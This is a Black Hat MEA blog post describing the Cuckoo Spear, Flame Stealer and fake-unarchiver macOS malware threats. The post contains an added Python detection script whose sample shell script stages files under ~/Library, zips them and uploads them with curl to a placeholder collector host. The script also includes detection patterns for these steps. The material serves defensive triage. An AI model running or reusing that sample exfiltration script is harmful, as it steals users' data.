Three new malware variants on the attack

by Black Hat Middle East and Africa

New malware variants hit the threat landscape all the time. Malware authors continuously modify code in order to avoid detection, and develop variants that can exploit security vulnerabilities before they’re patched.

Innovations in malware are also developed to exploit new technologies and platforms, and to extend existing malware with enhanced functionality, producing variants that are increasingly sophisticated.

Today’s malware is often designed on a modular architecture, which means developers can easily switch, add, or modify components – without having to rework the entire architecture. This means that new variants (with more advanced or more targeted capabilities) can emerge very quickly. 

And the availability of automated tools for creating and deploying malware is accelerating the generation of new threats – creating a landscape that is increasingly difficult for cybersecurity firms to monitor. 

Here are three new malware variants causing disruption for victims right now. 

1. Cuckoo Spear

Researchers at Cybereason have uncovered Cuckoo Spear, a threat actor linked with the APT10 group. Stealthy operations appear to have been underway for up to three years – with an advanced persistent threat (APT) that conducts cyber espionage. 

Cuckoo Spear is a new collective term for LODEINFO and NOOPDOOR, which have been found to be connected. Cuckoo Spear leverages both of these malware variants for persistent network infiltration and data exfiltration.

Cybereason’s team have explored the sophisticated capabilities of Cuckoo Spear, which include decryption mechanisms, modular architecture, and DGA-based C2 communication. 

2. Flame Stealer 

Flame Stealer, first uncovered in April 2024, is a comprehensive data thief – with the capabilities to steal a range of sensitive data. A tweet by ThreatMon notes that it can capture login information, passwords, credit card details, and PayPal information; and it claims to be undetectable by antivirus tools.

It then instantly transmits stolen data to a specific Telegram channel or webhook. Once it has infected a system, it remains active via automatic re-injection. 

Importantly, it’s been found to target a number of popular digital platforms, including Spotify, Instagram, TikTok, and Discord. So it poses a significant risk for a high volume of users. 

And it’s also capable of stealing digital wallet data and capturing Two-Factor Authentication codes when a user enters them, further compromising users’ security online. 

3. macOS malware disguised as an Unarchiver app

Unarchiver apps are used all the time, and digital users trust them as a means to extract archived files. But this trust can be abused by threat actors who plant malware into unarchiver downloads. 

Security analysts at Hunt.io recently discovered a phishing site disguised as a popular unarchiver app – with only a slightly modified domain name and download button to set the fake unarchiver site apart from the real one. 

A grabber zip file was found to contain 10 shell scripts with the purpose of stealing user data. The first script sets up a directory in the user’s library folder, collects IP information, and then executes the other data-grabbing scripts, before transmitting compressed, stolen data to a remote server.
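For defenders, the behaviour chain described above (stage in the Library folder, look up the IP, run further scripts, compress, upload) can be turned into a static triage check for shell scripts found in a download. This is an added example, not code from Hunt.io or from this article; the regex patterns, stage names and both sample scripts are constructed assumptions.

```python
import re

# Heuristic patterns, one per stage of the chain described above.
# All patterns are illustrative assumptions, not indicators from the Hunt.io research.
STAGES = {
    "library_staging": re.compile(r"mkdir\s+(?:-p\s+)?[\"']?(?:\$HOME|~|/Users/[^/\s]+)/Library/"),
    "ip_lookup": re.compile(r"(?:curl|wget)\b[^\n]*(?:ipinfo\.io|ifconfig\.me|api\.ipify\.org)"),
    "runs_other_scripts": re.compile(r"^\s*(?:sh|bash|zsh)\s+\S+\.sh\b", re.M),
    "archives_data": re.compile(r"\b(?:zip\s+-\w*r|tar\s+-?\w*c\w*|ditto\s+-c)"),
    "uploads_file": re.compile(r"curl\b[^\n]*\s(?:-F|--form|-T|--upload-file|--data-binary)\s"),
}

def triage(script_text):
    """Return the names of the stages whose pattern appears in the script."""
    return [name for name, rx in STAGES.items() if rx.search(script_text)]

def is_suspicious(stages):
    """Flag scripts that stage under ~/Library AND upload a file, plus one more stage.

    Installers legitimately create Library folders, so a single stage is never enough.
    """
    return {"library_staging", "uploads_file"} <= set(stages) and len(stages) >= 3

# Constructed sample mirroring the described first-stage script (placeholder host).
SAMPLE_FIRST_STAGE = '''#!/bin/sh
mkdir -p "$HOME/Library/Caches/.sample_stage"
curl -s https://ipinfo.io/json -o "$HOME/Library/Caches/.sample_stage/ip.json"
sh ./step2.sh
sh ./step3.sh
zip -r /tmp/sample_out.zip "$HOME/Library/Caches/.sample_stage"
curl -s -F "file=@/tmp/sample_out.zip" https://collector.example.invalid/upload
'''

# Constructed benign installer script: touches ~/Library but only unpacks resources.
SAMPLE_BENIGN = '''#!/bin/sh
mkdir -p "$HOME/Library/Application Support/MyApp"
tar -xzf resources.tar.gz -C "$HOME/Library/Application Support/MyApp"
'''

if __name__ == "__main__":
    for label, text in (("first_stage", SAMPLE_FIRST_STAGE), ("benign", SAMPLE_BENIGN)):
        found = triage(text)
        print(label, found, "SUSPICIOUS" if is_suspicious(found) else "ok")
```

A hit is a reason to inspect the archive by hand, not a verdict; obfuscated or variable-built commands will evade these patterns.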

Users must be vigilant and implement security updates 

As we continue to see new malware threats emerge on the threat landscape globally, it’s critical that all digital users have access to actionable cybersecurity education. They need to know what to look for – so they can stay vigilant. 

At the same time, software updates should be installed routinely to avoid leaving vulnerabilities unpatched. 

Join us at Black Hat MEA 2024 to discover the latest in malware research and threat detection. You’ll learn from the leading experts in cybersecurity – and gain the knowledge and tools you need to protect your organisation. 
